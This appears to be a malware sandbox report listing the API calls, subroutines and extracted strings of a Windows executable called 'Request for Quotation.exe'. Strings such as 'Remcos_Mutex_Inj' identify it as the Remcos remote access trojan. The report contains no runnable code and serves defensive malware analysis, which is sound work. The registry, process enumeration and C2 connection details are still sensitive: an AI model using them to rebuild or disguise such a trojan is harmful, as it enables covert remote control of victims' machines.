                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                                                                • wcslen.MSVCRT ref: 004090DB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                                                                  • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                                                                  • Part of subcall function 00407E37: CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                                                                  • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                                                                  • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                                                                  • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                                                                  • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                                                                  • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                                                                  • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                                                                • wcscpy.MSVCRT ref: 00409230
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                                                                  • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                                                                  • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                                                                  • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                  • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                  • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                  • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                  • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                  • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                                                                • atoi.MSVCRT ref: 00409391
                                                                                • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                                                                • atoi.MSVCRT ref: 00409540
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                  • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                                                                  • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                                                                  • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                                                                  • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                                                                  • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                                                                  • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                                                                  • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                                                                  • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                                                                  • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                                                                  • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                                                                  • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                                                                  • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                                                                  • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                                                                • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00412407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,73B743E0,0041BCB0,00000000), ref: 00412492
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000), ref: 0040C83F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 0040C855
                                                                                • atoi.MSVCRT ref: 0040C85C
                                                                                • Sleep.KERNEL32(00000000), ref: 0040C870
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416954,?), ref: 0040C884
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C898
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B50,?), ref: 0040C8CE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8E5
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,00415B50,00000000), ref: 0040C933
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040C943
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C950
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C961
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C975
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C981
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C99B
                                                                                • gethostbyname.WS2_32(00000000), ref: 0040C9A2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9D7
                                                                                • atoi.MSVCRT ref: 0040C9DE
                                                                                • htons.WS2_32(00000000), ref: 0040C9E6
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA10
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA18
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA21
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA3E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,00415B50,00000000), ref: 0040CA92
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040CAA2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CAAC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CABD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAD1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CADD
                                                                                • sprintf.MSVCRT ref: 0040CB14
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B954), ref: 0040CB25
                                                                                • _itoa.MSVCRT ref: 0040CB37
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040CB50
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040CB5D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040CB66
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 0040CB83
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 0040CBA5
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 00409E7D: GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                                                                  • Part of subcall function 00409E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\Desktop\Request for Quotation.exe,?), ref: 0040CBCC
                                                                                • GetTickCount.KERNEL32 ref: 0040CC20
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,0041B310,00000000,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000), ref: 0040CD07
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD17
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD27
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD37
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310), ref: 0040CD47
